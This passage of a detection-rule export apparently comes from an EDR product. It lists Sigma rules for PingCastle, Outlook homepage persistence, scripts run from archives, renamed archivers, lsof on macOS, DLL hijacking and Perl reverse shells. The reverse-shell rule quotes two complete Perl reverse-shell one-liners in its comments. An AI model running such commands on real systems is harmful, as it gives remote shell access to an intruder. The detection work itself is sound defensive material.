malicious scriptlet to achieve persistence and evade detection.\nIt is recommended to check for other suspicious activities by the process making the registry modification.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2026-02-12", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1216", "attack.t1546.015" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1b864817-8a01-4cfe-9481-20ce115320c8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.296790Z", "creation_date": "2026-03-23T11:45:35.296792Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.296797Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.pingcastle.com/", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/" ], "name": "t1087_002_pingcastle.yml", "content": "title: PingCastle Execution\nid: 1b864817-8a01-4cfe-9481-20ce115320c8\ndescription: |\n Detects the execution of PingCastle.\n PingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\n This tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\nreferences:\n - https://www.pingcastle.com/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\ndate: 2023/03/20\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1018\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PingCastle\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'PingCastle.exe'\n - 'PingCastle.dll'\n\n condition: selection\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1b864817-8a01-4cfe-9481-20ce115320c8", "rule_name": "PingCastle Execution", "rule_description": "Detects the execution of PingCastle.\nPingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\nThis tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\n", "rule_creation_date": "2023-03-20", "rule_modified_date": "2026-02-25", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1018", "attack.t1087.002", "attack.t1482", "attack.t1615" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626798Z", "creation_date": "2026-03-23T11:45:34.626800Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626804Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md", "https://attack.mitre.org/techniques/T1137/004/" ], "name": "t1137_004_outlook_homepage_changed.yml", "content": "title: Microsoft Outlook Homepage Changed via Registry\nid: 1c0971b5-dd3d-4802-967a-67f521f0ac2c\ndescription: |\n Detects a change of the Microsoft Outlook homepage via the registry.\n Attackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\n It is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md\n - https://attack.mitre.org/techniques/T1137/004/\ndate: 2021/06/24\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.004\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Outlook\\WebView\\\\*\\URL'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c", "rule_name": "Microsoft Outlook Homepage Changed via Registry", "rule_description": "Detects a change of the Microsoft Outlook homepage via the registry.\nAttackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\nIt is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\n", "rule_creation_date": "2021-06-24", "rule_modified_date": "2026-02-03", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1137.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085596Z", "creation_date": "2026-03-23T11:45:34.085599Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085603Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://twitter.com/dez_/status/1620828523094228992", "https://attack.mitre.org/techniques/T1204/002/" ], "name": "t1204_002_script_execution_from_archive.yml", "content": "title: Script Executed from Archive\nid: 1c2f6b57-2c30-4918-afa5-ff6fff38e99d\ndescription: |\n Detects the execution of a script from an archive using wscript.exe or cscript.exe.\n This can be indicative of a user execution of a malicious script, directly from the archive browser.\n It is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\nreferences:\n - https://twitter.com/dez_/status/1620828523094228992\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/09/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '?:\\Users\\\\*\\Temp\\RAR$'\n - '?:\\Users\\\\*\\Temp\\7z'\n - '?:\\Users\\\\*\\Temp\\Temp?_*.zip\\'\n - '?:\\Users\\\\*\\Temp\\\\*_*.zip.???\\'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_landesk:\n ParentImage|endswith: '\\Microsoft\\Dynamics Ax*\\New\\Files\\VisualCPP*.exe'\n\n exclusion_octave:\n CommandLine: 'wscript.exe ?:\\Users\\\\*AppData\\Local\\Programs\\GNU Octave\\Octave-*\\octave.vbs * ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_*.zip.???\\\\*'\n\n exclusion_ibm:\n CommandLine: '?:\\Windows\\System32\\WScript.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_IBMiAccess_*.zip.dc7\\Windows_Application\\install_*.js '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d", "rule_name": "Script Executed from Archive", "rule_description": "Detects the execution of a script from an archive using wscript.exe or cscript.exe.\nThis can be indicative of a user execution of a malicious script, directly from the archive browser.\nIt is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\n", "rule_creation_date": "2023-09-05", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1059", "attack.t1204.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1c812220-3709-4900-82e9-d3a5410edada", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.606332Z", "creation_date": "2026-03-23T11:45:34.606336Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.606343Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1560/001/" ], "name": "t1560_001_archiver_tool_renamed.yml", "content": "title: Renamed Archiver Tool Executed\nid: 1c812220-3709-4900-82e9-d3a5410edada\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\n Renamed archivers have been observed in use by threat actors for exfiltrating data.\n It is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_original:\n - Description: 'Command line RAR'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_goodname:\n - Image:\n - '*\\rar.exe'\n - '*\\unrar.exe'\n - '*\\7z.exe'\n - '*\\7za.exe'\n\n exclusion_unetbootin:\n Image|endswith: 'AppData\\Local\\Temp\\sevnz.exe'\n\n exclusion_known_fp:\n - ParentImage:\n - '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\7zS8D4DFD71\\BlueStacksInstaller.exe\n # D:\\Utilisateurs\\XXX\\AppData\\Local\\Temp\\7zS033C881C\\BlueStacksInstaller.exe\n - '*\\AppData\\Local\\Temp\\7zs????????\\BlueStacksInstaller.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_637623756875899969\\WD Discovery\\WD Discovery.exe\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_*\\WD Discovery\\WD Discovery.exe'\n - Image:\n - '?:\\Program Files (x86)\\BluestacksCN\\Engine\\7zr.exe'\n - '?:\\Program Files\\BlueStacks_nxt\\7zr.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LockScreen\\7zwrap.exe'\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WDDiscoveryInstaller.Resources.7za.exe'\n - '*\\NCH Software\\Components\\7zip\\7Zip.exe'\n - '*\\NCH Software\\Components\\7za32\\7Za32.exe'\n - '?:\\program files\\wondershare\\pdfelement*\\zip.exe'\n - '?:\\Program Files\\Wondershare\\Wondershare PDFelement pour Windows *\\zip.exe'\n - '?:\\Windows\\LTSvc\\_LTUPDATE\\LabtechUpdate.exe'\n\n condition: selection_original and not selection_goodname and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of archivers by an administrator or a third-party application.\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1c812220-3709-4900-82e9-d3a5410edada", "rule_name": "Renamed Archiver Tool Executed", "rule_description": "Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\nRenamed archivers have been observed in use by threat actors for exfiltrating data.\nIt is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\n", "rule_creation_date": "2020-12-15", "rule_modified_date": "2025-03-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection" ], "rule_technique_tags": [ "attack.t1560", "attack.t1560.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.294983Z", "creation_date": "2026-03-23T11:45:35.294987Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.295020Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1033/" ], "name": "t1033_lsof_macos.yml", "content": "title: Currently Open Files Listed via Lsof (macOS)\nid: 1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b\ndescription: |\n Detects the execution of the lsof command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\n It is recommended to check for malicious behavior by the process launching lsof.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/lsof'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/Applications/GlobalProtect.app/Contents/Resources/PanGPS'\n - '/Applications/PyCharm CE.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Users/*/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Applications/Webex.app/Contents/MacOS/Webex'\n - '/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Users/*/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/steam_osx'\n - '/Applications/AWS VPN Client/AWS VPN Client.app/Contents/Resources/AWS VPN Client/Contents/MacOS/ACVCHelperTool'\n - '/Library/PrivilegedHelperTools/com.amazonaws.acvc.helper'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n - '/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Users/*/Applications/IntelliJ IDEA Ultimate.app/Contents/MacOS/idea'\n - '/applications/rider.app/contents/macos/rider'\n - '/Applications/GoLand.app/Contents/MacOS/goland'\n - '/Applications/IntelliJ IDEA CE.app/Contents/MacOS/idea'\n - '/Applications/RubyMine.app/Contents/MacOS/rubymine'\n - '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Applications/Android Studio.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac_5.app/Contents/MacOS/CleanMyMac_5'\n - '/Applications/Android Studio Preview.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac X.app/Contents/MacOS/CleanMyMac X'\n - '/Users/*/Library/Application Support/WebEx Folder/Add-ons/Cisco WebEx Start.app/Contents/MacOS/Cisco WebEx Start'\n - '/Applications/SekoiaEndpointAgent.app/Contents/MacOS/SekoiaEndpointAgent'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper.app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/MacOS/VMware Fusion Applications Menu'\n - '/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/private/var/folders/*/com.docker.install/in_progress/Docker.app/Contents/MacOS/install'\n - '/Applications/Docker.app/Contents/MacOS/install'\n\n # /usr/sbin/lsof -g -o -R /Users//Library/Application Support/WebEx Folder/MC_/Meeting Center.app\n exclusion_cisco_meeting_center:\n ParentImage|endswith: '/Cisco WebEx Start'\n CommandLine|contains|all:\n - '/usr/sbin/lsof -g -o -R /Users/'\n - 'Library/Application Support/WebEx Folder/MC_'\n - 'Meeting Center.app'\n\n # lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions//Google Chrome Framework\n exclusion_google_chrome_updater:\n CommandLine: 'lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Google Chrome Framework'\n\n # lsof -OPln -p \n exclusion_vs_code:\n GrandparentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code - Helper (Renderer).app/Contents/MacOS/Code - Helper (Renderer)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Renderer).app/Contents/MacOS/Code - Insiders Helper (Renderer)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n CommandLine|startswith: 'lsof -OPln -p'\n\n exclusion_cwd:\n ParentCommandLine: '/bin/sh -c lsof -OPln * | grep cwd'\n\n exclusion_ampdevicesagent:\n CommandLine|startswith: '/usr/sbin/lsof -c AMPDevicesAgent'\n\n exclusion_edge:\n CommandLine: 'lsof /Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Microsoft Edge Framework'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_rider:\n ParentImage:\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/Rider 2.app/Contents/MacOS/rider'\n\n exclusion_inteliJ_idea:\n ParentImage|endswith: '/IntelliJ IDEA.app/Contents/MacOS/idea'\n # TODO : signed: 'true'\n\n exclusion_bluejeans:\n ParentImage: '/Applications/BlueJeans.app/Contents/Resources/daemon/BlueJeansHelper.app/Contents/MacOS/BlueJeansHelper'\n\n exclusion_activity_monitor:\n ParentImage: '/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor'\n\n exclusion_android_studio:\n ParentImage: '/Applications/Android Studio.app/Contents/MacOS/studio'\n\n exclusion_erlang:\n Ancestors|startswith: '/bin/bash|/bin/bash|/opt/homebrew/Cellar/erlang/'\n\n # lsof -d 0-9999999 -lna -p \n exclusion_unknown:\n CommandLine|re: '^lsof -d 0-9999999 -lna -p \\d+$'\n ParentCommandLine: '/bin/sh -s unix:cmd'\n GrandparentCommandLine: '/bin/sh -s unix:cmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b", "rule_name": "Currently Open Files Listed via Lsof (macOS)", "rule_description": "Detects the execution of the lsof command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\nIt is recommended to check for malicious behavior by the process launching lsof.\n", "rule_creation_date": "2022-11-22", "rule_modified_date": "2026-02-11", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1033" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1cf5a84d-3577-4fed-aad6-e9be68687766", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.096335Z", "creation_date": "2026-03-23T11:45:34.096338Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.096343Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_tcmsetup.yml", "content": "title: DLL Hijacking via tcmsetup.exe\nid: 1cf5a84d-3577-4fed-aad6-e9be68687766\ndescription: |\n Detects potential Windows DLL Hijacking via tcmsetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tcmsetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1cf5a84d-3577-4fed-aad6-e9be68687766", "rule_name": "DLL Hijacking via tcmsetup.exe", "rule_description": "Detects potential Windows DLL Hijacking via tcmsetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618088Z", "creation_date": "2026-03-23T11:45:34.618090Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618094Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", "https://attack.mitre.org/techniques/T1059/004/" ], "name": "t1059_004_reverse_shell_perl_macos.yml", "content": "title: Reverse Shell Executed via Perl (macOS)\nid: 1d0a5e73-d3a2-4ecd-9969-fe46c41edd38\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Perl.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.perl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/perl'\n\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_variant1:\n CommandLine|contains|all:\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_variant2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: selection_base and 1 of selection_variant*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38", "rule_name": "Reverse Shell Executed via Perl (macOS)", "rule_description": "Detects a suspicious command line related to a reverse shell execution via Perl.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-03-31", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": 